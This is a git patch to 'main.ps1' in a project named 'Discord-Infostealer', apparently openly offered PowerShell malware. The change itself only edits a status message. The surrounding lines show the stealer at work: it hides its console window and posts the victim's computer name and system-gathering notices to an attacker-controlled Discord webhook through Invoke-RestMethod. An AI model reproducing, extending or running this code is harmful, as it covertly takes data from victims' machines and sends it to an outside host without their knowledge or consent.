From 31a5e063e65977fb2b262ad11de8e34ddf7a0a38 Mon Sep 17 00:00:00 2001 From: egieb <93350544+beigeworm@users.noreply.github.com> Date: Mon, 12 Feb 2024 15:28:44 +0000 Subject: [PATCH] Update main.ps1 --- Discord-Infostealer/main.ps1 | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Discord-Infostealer/main.ps1 b/Discord-Infostealer/main.ps1 index 947a52f..a2b92a1 100644 --- a/Discord-Infostealer/main.ps1 +++ b/Discord-Infostealer/main.ps1 @@ -16,7 +16,7 @@ else{ $hwnd = $Proc.MainWindowHandle $Type::ShowWindowAsync($hwnd, 0) } -$jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = ":computer: ``Gathering System Information for $env:COMPUTERNAME`` :computer:"} | ConvertTo-Json +$jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = ":computer: ``Gathering System Information for $env:COMPUTERNAME.. Please wait`` :computer:"} | ConvertTo-Json Invoke-RestMethod -Uri $hookurl -Method Post -ContentType "application/json" -Body $jsonsys Add-Type -AssemblyName System.Windows.Forms